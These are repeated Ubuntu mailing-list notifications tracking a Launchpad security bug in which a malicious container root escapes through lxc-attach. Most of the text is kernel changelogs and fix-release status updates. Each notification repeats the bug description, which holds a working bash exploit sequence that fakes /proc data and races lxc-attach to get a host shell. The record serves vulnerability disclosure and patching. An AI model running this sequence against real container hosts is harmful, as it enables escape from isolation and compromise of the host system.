[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 4.8.0-30.32 --- linux (4.8.0-30.32) yakkety; urgency=low * CVE-2016-8655 (LP: #1646318) - packet: fix race condition in packet_set_ring -- Brad Figg Thu, 01 Dec 2016 08:02:53 -0800 ** Changed in: linux (Ubuntu) Status: Triaged => Fix Released ** CVE added: http://www.cve.mitre.org/cgi- bin/cvename.cgi?name=2016-8655 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1639345 Title: lxc-attach to malicious container allows access to host Status in linux package in Ubuntu: Fix Released Status in lxc package in Ubuntu: Fix Released Status in linux source package in Trusty: Fix Released Status in lxc source package in Trusty: Fix Released Status in linux source package in Vivid: Fix Released Status in lxc source package in Vivid: Fix Released Status in linux source package in Xenial: Fix Released Status in lxc source package in Xenial: Fix Released Status in linux source package in Yakkety: Fix Released Status in lxc source package in Yakkety: Fix Released Bug description: A malicious root user in an unprivileged container may interfere with lxc-attach to provide manipulated guest proc file system information to disable dropping of capabilities and may in the end access the host file system by winning a very easy race against lxc-attach. In guest sequence: cat < /tmp/test #!/bin/bash -e rm -rf /test || true mkdir -p /test/sys/kernel echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts echo 0 > /test/sys/kernel/cap_last_cap mkdir -p /test/self mknod /test/self/status p cd /proc mount -o bind /test /proc while true; do pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/') if [ "\${pid}" != "" ]; then cd / umount -i -f -l -n /proc exec /LxcAttachEscape "\${pid}" /bin/bash fi sleep 1 done EOF See attachment for LxcAttachEscape.c Exploit uses fixed fd=7 for attacking, on other test environment, it might be other fd. Tests were performed by attacking lxc-attach started by screen lxc-attach -n [guestname] which is the sequence required against the TTY-stealing attacks also not fixed in all lxc-attach versions. In my opinion two bugs might need fixing: * lxc-attach should not use untrusted/manipulated information for proceeding * kernel should prevent against ptracing of lxc-attach as it was created in another USERNS # lsb_release -r -d Description:Ubuntu 16.04.1 LTS Release:16.04 # apt-cache policy lxc1 lxc1: Installed: 2.0.5-0ubuntu1~ubuntu16.04.2 Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2 Version table: *** 2.0.5-0ubuntu1~ubuntu16.04.2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.0.0-0ubuntu2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 4.8.0-28.30 --- linux (4.8.0-28.30) yakkety; urgency=low [ Luis Henriques ] * Release Tracking Bug - LP: #1641083 * lxc-attach to malicious container allows access to host (LP: #1639345) - Revert "UBUNTU: SAUCE: (noup) ptrace: being capable wrt a process requires mapped uids/gids" - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission checks * [Feature] AVX-512 new instruction sets (avx512_4vnniw, avx512_4fmaps) (LP: #1637526) - x86/cpufeature: Add AVX512_4VNNIW and AVX512_4FMAPS features * zfs: importing zpool with vdev on zvol hangs kernel (LP: #1636517) - SAUCE: (noup) Update zfs to 0.6.5.8-0ubuntu4.1 * Move some device drivers build from kernel built-in to modules (LP: #1637303) - [Config] CONFIG_TIGON3=m for all arches - [Config] CONFIG_VIRTIO_BLK=m, CONFIG_VIRTIO_NET=m * I2C touchpad does not work on AMD platform (LP: #1612006) - pinctrl/amd: Configure GPIO register using BIOS settings * guest experiencing Transmit Timeouts on CX4 (LP: #1636330) - powerpc/64: Re-fix race condition between going idle and entering guest - powerpc/64: Fix race condition in setting lock bit in idle/wakeup code * QEMU throws failure msg while booting guest with SRIOV VF (LP: #1630554) - KVM: PPC: Always select KVM_VFIO, plus Makefile cleanup * [Feature] KBL - New device ID for Kabypoint(KbP) (LP: #1591618) - SAUCE: mfd: lpss: Fix Intel Kaby Lake PCH-H properties * hio: SSD data corruption under stress test (LP: #1638700) - SAUCE: hio: set bi_error field to signal an I/O error on a BIO - SAUCE: hio: splitting bio in the entry of .make_request_fn * cleanup primary tree for linux-hwe layering issues (LP: #1637473) - [Config] switch Vcs-Git: to yakkety repository - [Packaging] handle both linux-lts* and linux-hwe* as backports - [Config] linux-tools-common and linux-cloud-tools-common are one per series - [Config] linux-source-* is in the primary linux namespace - [Config] linux-tools -- always suggest the base package * SRU: sync zfsutils-linux and spl-linux changes to linux (LP: #1635656) - SAUCE: (noup) Update spl to 0.6.5.8-2, zfs to 0.6.5.8-0ubuntu4 (LP: #1635656) * [Feature] SKX: perf uncore PMU support (LP: #1591810) - perf/x86/intel/uncore: Add Skylake server uncore support - perf/x86/intel/uncore: Remove hard-coded implementation for Node ID mapping location - perf/x86/intel/uncore: Handle non-standard counter offset * [Feature] Purley: Memory Protection Keys (LP: #1591804) - x86/pkeys: Add fault handling for PF_PK page fault bit - mm: Implement new pkey_mprotect() system call - x86/pkeys: Make mprotect_key() mask off additional vm_flags - x86/pkeys: Allocation/free syscalls - x86: Wire up protection keys system calls - generic syscalls: Wire up memory protection keys syscalls - pkeys: Add details of system call use to Documentation/ - x86/pkeys: Default to a restrictive init PKRU - x86/pkeys: Allow configuration of init_pkru - x86/pkeys: Add self-tests * kernel invalid opcode in intel_powerclamp (LP: #1630774) - SAUCE: (no-up) thermal/powerclamp: correct cpu support check * please include mlx5_core modules in linux-image-generic package (LP: #1635223) - [Config] Include mlx5 in main package * [LTCTest] vfio_pci not loaded on Ubuntu 16.10 by default (LP: #1636733) - [Config] CONFIG_VFIO_PCI=y for ppc64el * Yakkety update to v4.8.6 stable release (LP: #1638748) - drm/vc4: Fix races when the CS reads from render targets. - drm/prime: Pass the right module owner through to dma_buf_export() - drm/i915/backlight: setup and cache pwm alternate increment value - drm/i915/backlight: setup backlight pwm alternate increment on backlight enable - drm/amdgpu: fix IB alignment for UVD - drm/amdgpu/dce10: disable hpd on local panels - drm/amdgpu/dce8: disable hpd on local panels - drm/amdgpu/dce11: disable hpd on local panels - drm/amdgpu/dce11: add missing drm_mode_config_cleanup call - drm/amdgpu: initialize the context reset_counter in amdgpu_ctx_init - drm/amdgpu: change vblank_time's calculation method to reduce computational error. - drm/radeon: narrow asic_init for virtualization - drm/radeon/si/dpm: fix phase shedding setup - drm/radeon: change vblank_time's calculation method to reduce computational error. - drm/vmwgfx: Limit the user-space command buffer size - drm/fsl-dcu: fix endian issue when using clk_register_divider - drm/amd/powerplay: fix mclk not switching back after multi-head was disabled - HID: add quirk for Akai MIDImix. - drm/i915/skl: Update plane watermarks atomically during plane updates - drm/i915: Move CRTC updating in atomic_commit into it's own hook - drm/i915/skl: Update DDB values atomi
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 4.4.0-51.72 --- linux (4.4.0-51.72) xenial; urgency=low [ Luis Henriques ] * Release Tracking Bug - LP: #1644611 * 4.4.0-1037-snapdragon #41: kernel panic on boot (LP: #1644596) - Revert "dma-mapping: introduce the DMA_ATTR_NO_WARN attribute" - Revert "powerpc: implement the DMA_ATTR_NO_WARN attribute" - Revert "nvme: use the DMA_ATTR_NO_WARN attribute" linux (4.4.0-50.71) xenial; urgency=low [ Luis Henriques ] * Release Tracking Bug - LP: #1644169 * xenial 4.4.0-49.70 kernel breaks LXD userspace (LP: #1644165) - Revert "UBUNTU: SAUCE: (namespace) fuse: Allow user namespace mounts by default" - Revert "UBUNTU: SAUCE: (namespace) fs: Don't remove suid for CAP_FSETID for userns root" - Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Don't remove suid for CAP_FSETID in s_user_ns"" - Revert "UBUNTU: SAUCE: (namespace) fs: Allow superblock owner to change ownership of inodes" - Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Allow superblock owner to change ownership of inodes with unmappable ids"" - Revert "UBUNTU: SAUCE: (namespace) security/integrity: Harden against malformed xattrs" - Revert "(namespace) Revert "UBUNTU: SAUCE: ima/evm: Allow root in s_user_ns to set xattrs"" - Revert "(namespace) dquot: For now explicitly don't support filesystems outside of init_user_ns" - Revert "(namespace) quota: Handle quota data stored in s_user_ns in quota_setxquota" - Revert "(namespace) quota: Ensure qids map to the filesystem" - Revert "(namespace) Revert "UBUNTU: SAUCE: quota: Convert ids relative to s_user_ns"" - Revert "(namespace) Revert "UBUNTU: SAUCE: quota: Require that qids passed to dqget() be valid and map into s_user_ns"" - Revert "(namespace) vfs: Don't create inodes with a uid or gid unknown to the vfs" - Revert "(namespace) vfs: Don't modify inodes with a uid or gid unknown to the vfs" - Revert "UBUNTU: SAUCE: (namespace) fuse: Translate ids in posix acl xattrs" - Revert "UBUNTU: SAUCE: (namespace) posix_acl: Export posix_acl_fix_xattr_userns() to modules" - Revert "(namespace) vfs: Verify acls are valid within superblock's s_user_ns." - Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Update posix_acl support to handle user namespace mounts"" - Revert "(namespace) fs: Refuse uid/gid changes which don't map into s_user_ns" - Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Refuse uid/gid changes which don't map into s_user_ns"" - Revert "(namespace) mnt: Move the FS_USERNS_MOUNT check into sget_userns" linux (4.4.0-49.70) xenial; urgency=low [ Luis Henriques ] * Release Tracking Bug - LP: #1640921 * Infiniband driver (kernel module) needed for Azure (LP: #1641139) - SAUCE: RDMA Infiniband for Windows Azure - [Config] CONFIG_HYPERV_INFINIBAND_ND=m - SAUCE: Makefile RDMA infiniband driver for Windows Azure - [Config] Add hv_network_direct.ko to generic inclusion list - SAUCE: RDMA Infiniband for Windows Azure is dependent on amd64 linux (4.4.0-48.69) xenial; urgency=low [ Luis Henriques ] * Release Tracking Bug - LP: #1640758 * lxc-attach to malicious container allows access to host (LP: #1639345) - Revert "UBUNTU: SAUCE: (noup) ptrace: being capable wrt a process requires mapped uids/gids" - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission checks * take 'P' command from upstream xmon (LP: #1637978) - powerpc/xmon: Add xmon command to dump process/task similar to ps(1) * zfs: importing zpool with vdev on zvol hangs kernel (LP: #1636517) - SAUCE: (noup) Update zfs to 0.6.5.6-0ubuntu15 * I2C touchpad does not work on AMD platform (LP: #1612006) - pinctrl/amd: Configure GPIO register using BIOS settings - pinctrl/amd: switch to using a bool for level * [LTCTest] vfio_pci not loaded on Ubuntu 16.10 by default (LP: #1636733) - [Config] CONFIG_VFIO_PCI=y for ppc64el * QEMU throws failure msg while booting guest with SRIOV VF (LP: #1630554) - KVM: PPC: Always select KVM_VFIO, plus Makefile cleanup * Allow fuse user namespace mounts by default in xenial (LP: #1634964) - (namespace) mnt: Move the FS_USERNS_MOUNT check into sget_userns - (namespace) Revert "UBUNTU: SAUCE: fs: Refuse uid/gid changes which don't map into s_user_ns" - (namespace) fs: Refuse uid/gid changes which don't map into s_user_ns - (namespace) Revert "UBUNTU: SAUCE: fs: Update posix_acl support to handle user namespace mounts" - (namespace) vfs: Verify acls are valid within superblock's s_user_ns. - SAUCE: (namespace) posix_acl: Export posix_acl_fix_xattr_userns() to modules - SAUCE: (namespace) fuse: Translate ids in posix acl xattrs - (namespace) vfs: Don't modify inodes with a uid or
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 3.19.0-75.83 --- linux (3.19.0-75.83) vivid; urgency=low [ Luis Henriques ] * Release Tracking Bug - LP: #1640613 * lxc-attach to malicious container allows access to host (LP: #1639345) - Revert "UBUNTU: ptrace: being capable wrt a process requires mapped uids/gids" - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission checks * CVE-2016-8658 - brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap() * CVE-2016-7425 - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() -- Luis Henriques Wed, 09 Nov 2016 22:48:56 + ** Changed in: linux (Ubuntu Vivid) Status: Fix Committed => Fix Released ** Changed in: linux (Ubuntu Xenial) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1639345 Title: lxc-attach to malicious container allows access to host Status in linux package in Ubuntu: Triaged Status in lxc package in Ubuntu: Fix Released Status in linux source package in Trusty: Fix Released Status in lxc source package in Trusty: Fix Released Status in linux source package in Vivid: Fix Released Status in lxc source package in Vivid: Fix Released Status in linux source package in Xenial: Fix Released Status in lxc source package in Xenial: Fix Released Status in linux source package in Yakkety: Fix Released Status in lxc source package in Yakkety: Fix Released Bug description: A malicious root user in an unprivileged container may interfere with lxc-attach to provide manipulated guest proc file system information to disable dropping of capabilities and may in the end access the host file system by winning a very easy race against lxc-attach. In guest sequence: cat < /tmp/test #!/bin/bash -e rm -rf /test || true mkdir -p /test/sys/kernel echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts echo 0 > /test/sys/kernel/cap_last_cap mkdir -p /test/self mknod /test/self/status p cd /proc mount -o bind /test /proc while true; do pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/') if [ "\${pid}" != "" ]; then cd / umount -i -f -l -n /proc exec /LxcAttachEscape "\${pid}" /bin/bash fi sleep 1 done EOF See attachment for LxcAttachEscape.c Exploit uses fixed fd=7 for attacking, on other test environment, it might be other fd. Tests were performed by attacking lxc-attach started by screen lxc-attach -n [guestname] which is the sequence required against the TTY-stealing attacks also not fixed in all lxc-attach versions. In my opinion two bugs might need fixing: * lxc-attach should not use untrusted/manipulated information for proceeding * kernel should prevent against ptracing of lxc-attach as it was created in another USERNS # lsb_release -r -d Description:Ubuntu 16.04.1 LTS Release:16.04 # apt-cache policy lxc1 lxc1: Installed: 2.0.5-0ubuntu1~ubuntu16.04.2 Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2 Version table: *** 2.0.5-0ubuntu1~ubuntu16.04.2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.0.0-0ubuntu2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 3.13.0-103.150 --- linux (3.13.0-103.150) trusty; urgency=low [ Luis Henriques ] * Release Tracking Bug - LP: #1644489 * Possible regression on 3.13.0-102.149~precise1 x86_64 (gce) (LP: #1644302) - SAUCE: apparmor: delete extra variable dev_path linux (3.13.0-102.149) trusty; urgency=low [ Luis Henriques ] * Release Tracking Bug - LP: #1640581 * lxc-attach to malicious container allows access to host (LP: #1639345) - Revert "UBUNTU: ptrace: being capable wrt a process requires mapped uids/gids" - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission checks * Syntax error extra parenthesis linux-headers-3.13.0-100/Makefile (LP: #1636625) - Makefile: fix extra parenthesis typo when CC_STACKPROTECTOR_REGULAR is enabled * Add a driver for Amazon Elastic Network Adapters (ENA) (LP: #1635721) - lib/bitmap.c: conversion routines to/from u32 array - kernel.h: define u8, s8, u32, etc. limits - net: ethtool: add new ETHTOOL_xLINKSETTINGS API - PCI/MSI: Add pci_msix_vec_count() - etherdevice: Use ether_addr_copy to copy an Ethernet address - net: ena: Add a driver for Amazon Elastic Network Adapters (ENA) - [config] enable CONFIG_ENA_ETHERNET=m (Amazon ENA driver) * CVE-2016-8658 - brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap() * CVE-2016-7425 - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() * srcname from mount rule corrupted under load (LP: #1634753) - SAUCE: apparmor: fix sleep in critical section * ghash-clmulni-intel module fails to load (LP: #1633058) - crypto: ghash-clmulni - Fix load failure - crypto: cryptd - Assign statesize properly -- Luis Henriques Thu, 24 Nov 2016 09:56:54 + ** Changed in: linux (Ubuntu Trusty) Status: Fix Committed => Fix Released ** CVE added: http://www.cve.mitre.org/cgi- bin/cvename.cgi?name=2016-7425 ** CVE added: http://www.cve.mitre.org/cgi- bin/cvename.cgi?name=2016-8658 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1639345 Title: lxc-attach to malicious container allows access to host Status in linux package in Ubuntu: Triaged Status in lxc package in Ubuntu: Fix Released Status in linux source package in Trusty: Fix Released Status in lxc source package in Trusty: Fix Released Status in linux source package in Vivid: Fix Released Status in lxc source package in Vivid: Fix Released Status in linux source package in Xenial: Fix Released Status in lxc source package in Xenial: Fix Released Status in linux source package in Yakkety: Fix Committed Status in lxc source package in Yakkety: Fix Released Bug description: A malicious root user in an unprivileged container may interfere with lxc-attach to provide manipulated guest proc file system information to disable dropping of capabilities and may in the end access the host file system by winning a very easy race against lxc-attach. In guest sequence: cat < /tmp/test #!/bin/bash -e rm -rf /test || true mkdir -p /test/sys/kernel echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts echo 0 > /test/sys/kernel/cap_last_cap mkdir -p /test/self mknod /test/self/status p cd /proc mount -o bind /test /proc while true; do pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/') if [ "\${pid}" != "" ]; then cd / umount -i -f -l -n /proc exec /LxcAttachEscape "\${pid}" /bin/bash fi sleep 1 done EOF See attachment for LxcAttachEscape.c Exploit uses fixed fd=7 for attacking, on other test environment, it might be other fd. Tests were performed by attacking lxc-attach started by screen lxc-attach -n [guestname] which is the sequence required against the TTY-stealing attacks also not fixed in all lxc-attach versions. In my opinion two bugs might need fixing: * lxc-attach should not use untrusted/manipulated information for proceeding * kernel should prevent against ptracing of lxc-attach as it was created in another USERNS # lsb_release -r -d Description:Ubuntu 16.04.1 LTS Release:16.04 # apt-cache policy lxc1 lxc1: Installed: 2.0.5-0ubuntu1~ubuntu16.04.2 Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2 Version table: *** 2.0.5-0ubuntu1~ubuntu16.04.2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.0.0-0ubuntu2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages P
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
** Changed in: linux (Ubuntu) Status: Incomplete => Triaged -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1639345 Title: lxc-attach to malicious container allows access to host Status in linux package in Ubuntu: Triaged Status in lxc package in Ubuntu: Fix Released Status in linux source package in Trusty: Fix Committed Status in lxc source package in Trusty: Fix Released Status in linux source package in Vivid: Fix Committed Status in lxc source package in Vivid: Fix Released Status in linux source package in Xenial: Fix Committed Status in lxc source package in Xenial: Fix Released Status in linux source package in Yakkety: Fix Committed Status in lxc source package in Yakkety: Fix Released Bug description: A malicious root user in an unprivileged container may interfere with lxc-attach to provide manipulated guest proc file system information to disable dropping of capabilities and may in the end access the host file system by winning a very easy race against lxc-attach. In guest sequence: cat < /tmp/test #!/bin/bash -e rm -rf /test || true mkdir -p /test/sys/kernel echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts echo 0 > /test/sys/kernel/cap_last_cap mkdir -p /test/self mknod /test/self/status p cd /proc mount -o bind /test /proc while true; do pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/') if [ "\${pid}" != "" ]; then cd / umount -i -f -l -n /proc exec /LxcAttachEscape "\${pid}" /bin/bash fi sleep 1 done EOF See attachment for LxcAttachEscape.c Exploit uses fixed fd=7 for attacking, on other test environment, it might be other fd. Tests were performed by attacking lxc-attach started by screen lxc-attach -n [guestname] which is the sequence required against the TTY-stealing attacks also not fixed in all lxc-attach versions. In my opinion two bugs might need fixing: * lxc-attach should not use untrusted/manipulated information for proceeding * kernel should prevent against ptracing of lxc-attach as it was created in another USERNS # lsb_release -r -d Description:Ubuntu 16.04.1 LTS Release:16.04 # apt-cache policy lxc1 lxc1: Installed: 2.0.5-0ubuntu1~ubuntu16.04.2 Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2 Version table: *** 2.0.5-0ubuntu1~ubuntu16.04.2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.0.0-0ubuntu2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
** Changed in: linux (Ubuntu) Status: Incomplete => New ** Tags added: bot-stop-nagging -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1639345 Title: lxc-attach to malicious container allows access to host Status in linux package in Ubuntu: New Status in lxc package in Ubuntu: Fix Released Status in linux source package in Trusty: Fix Committed Status in lxc source package in Trusty: Fix Released Status in linux source package in Vivid: Fix Committed Status in lxc source package in Vivid: Fix Released Status in linux source package in Xenial: Fix Committed Status in lxc source package in Xenial: Fix Released Status in linux source package in Yakkety: Fix Committed Status in lxc source package in Yakkety: Fix Released Bug description: A malicious root user in an unprivileged container may interfere with lxc-attach to provide manipulated guest proc file system information to disable dropping of capabilities and may in the end access the host file system by winning a very easy race against lxc-attach. In guest sequence: cat < /tmp/test #!/bin/bash -e rm -rf /test || true mkdir -p /test/sys/kernel echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts echo 0 > /test/sys/kernel/cap_last_cap mkdir -p /test/self mknod /test/self/status p cd /proc mount -o bind /test /proc while true; do pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/') if [ "\${pid}" != "" ]; then cd / umount -i -f -l -n /proc exec /LxcAttachEscape "\${pid}" /bin/bash fi sleep 1 done EOF See attachment for LxcAttachEscape.c Exploit uses fixed fd=7 for attacking, on other test environment, it might be other fd. Tests were performed by attacking lxc-attach started by screen lxc-attach -n [guestname] which is the sequence required against the TTY-stealing attacks also not fixed in all lxc-attach versions. In my opinion two bugs might need fixing: * lxc-attach should not use untrusted/manipulated information for proceeding * kernel should prevent against ptracing of lxc-attach as it was created in another USERNS # lsb_release -r -d Description:Ubuntu 16.04.1 LTS Release:16.04 # apt-cache policy lxc1 lxc1: Installed: 2.0.5-0ubuntu1~ubuntu16.04.2 Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2 Version table: *** 2.0.5-0ubuntu1~ubuntu16.04.2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.0.0-0ubuntu2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1639345 Title: lxc-attach to malicious container allows access to host Status in linux package in Ubuntu: New Status in lxc package in Ubuntu: Fix Released Status in linux source package in Trusty: Fix Committed Status in lxc source package in Trusty: Fix Released Status in linux source package in Vivid: Fix Committed Status in lxc source package in Vivid: Fix Released Status in linux source package in Xenial: Fix Committed Status in lxc source package in Xenial: Fix Released Status in linux source package in Yakkety: Fix Committed Status in lxc source package in Yakkety: Fix Released Bug description: A malicious root user in an unprivileged container may interfere with lxc-attach to provide manipulated guest proc file system information to disable dropping of capabilities and may in the end access the host file system by winning a very easy race against lxc-attach. In guest sequence: cat < /tmp/test #!/bin/bash -e rm -rf /test || true mkdir -p /test/sys/kernel echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts echo 0 > /test/sys/kernel/cap_last_cap mkdir -p /test/self mknod /test/self/status p cd /proc mount -o bind /test /proc while true; do pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/') if [ "\${pid}" != "" ]; then cd / umount -i -f -l -n /proc exec /LxcAttachEscape "\${pid}" /bin/bash fi sleep 1 done EOF See attachment for LxcAttachEscape.c Exploit uses fixed fd=7 for attacking, on other test environment, it might be other fd. Tests were performed by attacking lxc-attach started by screen lxc-attach -n [guestname] which is the sequence required against the TTY-stealing attacks also not fixed in all lxc-attach versions. In my opinion two bugs might need fixing: * lxc-attach should not use untrusted/manipulated information for proceeding * kernel should prevent against ptracing of lxc-attach as it was created in another USERNS # lsb_release -r -d Description:Ubuntu 16.04.1 LTS Release:16.04 # apt-cache policy lxc1 lxc1: Installed: 2.0.5-0ubuntu1~ubuntu16.04.2 Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2 Version table: *** 2.0.5-0ubuntu1~ubuntu16.04.2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.0.0-0ubuntu2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp